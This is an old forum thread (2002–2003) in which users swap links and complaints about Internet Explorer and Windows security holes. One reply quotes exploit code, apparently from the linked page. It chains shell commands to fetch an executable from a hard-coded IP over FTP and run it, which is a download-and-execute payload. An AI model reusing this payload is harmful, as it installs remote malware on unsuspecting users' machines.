Stop Microsoft

All Things Microsoft => Microsoft Software => Topic started by: anphanax on 29 December 2002, 10:04

Title: yet another exploit
Post by: anphanax on 29 December 2002, 10:04

http://unsecured.netfirms.com/exploit.jpg (http://unsecured.netfirms.com/exploit.jpg)

this doesn't work with Mozilla or Netscape
But it sure as hell does with MSIE

Edit: Isn't it amazing how MSIE will just let you
use any extension for HTML files. I wander if
this little bug has some my computer zone
privledges. That would be funny and devestating
if someone played around with VBScript in this
way.

As a side not, similar to MS, of course America
Online has yet another problem, this one
involving punters:
www.xeons.net (http://www.xeons.net) (sad, but as form of proof)

New Edit:
http://www.zeropaid.com/news/articles/auto/12182002g.php (http://www.zeropaid.com/news/articles/auto/12182002g.php)
apparently windows users also get to deal with
buffer overflow errors regarding "oversized"
mp3s and wmv files. I noticed their PNG thing
as well, and I have seen how MSIE doesn't always
handle them properly anyways, but THIS IS
PATHETIC.. And now windows xp users must wait
until MS patches this. (If they haven't already)
Note article dating: December 18, 2002, 5:12 PM PT

[ December 29, 2002: Message edited by: anphanax ]

Title: yet another exploit
Post by: Calum on 4 January 2003, 06:44

article from pcgames.de (http://216.239.35.120/translate_c?hl=en&u=http://www.pcgames.de/%3Farticle_id%3D116180&prev=/search%3Fq%3D%2522creative%2Bsoundblaster%2B4.1%2Bdigital%2522%2Blinux%26hl%3Den%26lr%3D%26ie%3DUTF-8%26sa%3DG)

Not quite so bad, just another article about microsoft's swiss cheese shaped software.

[ January 03, 2003: Message edited by: Calum ]

[ January 04, 2003: Message edited by: Calum ]

Title: yet another exploit
Post by: Gooseberry Clock on 4 January 2003, 20:16

Let's see how long it takes them to bust this guy.

Title: yet another exploit
Post by: Calum on 4 January 2003, 23:09

what guy, fuckass?

Title: yet another exploit
Post by: Gooseberry Clock on 8 January 2003, 23:20

quote:

---

args = '/c echo o 141.156.185.80> c:/windows/ftp.txt & '+
 'echo user anonymous>> c:/windows/ftp.txt & '+
 'echo anonymous@anonymous>> c:/windows/ftp.txt & '+
 'echo get /fun.exe c:/windows/taskdl.exe>> c:/windows/ftp.txt & '+
 'echo quit>> c:/windows/ftp.txt & '+
 'ftp -i -n -v -s:c:/windows/ftp.txt & '+
 'c:/windows/taskdl.exe';

---

His IP is clearly visible in the unescaped code.

Title: yet another exploit
Post by: Calum on 9 January 2003, 14:20

oh okay, didn't realise who you were talking about...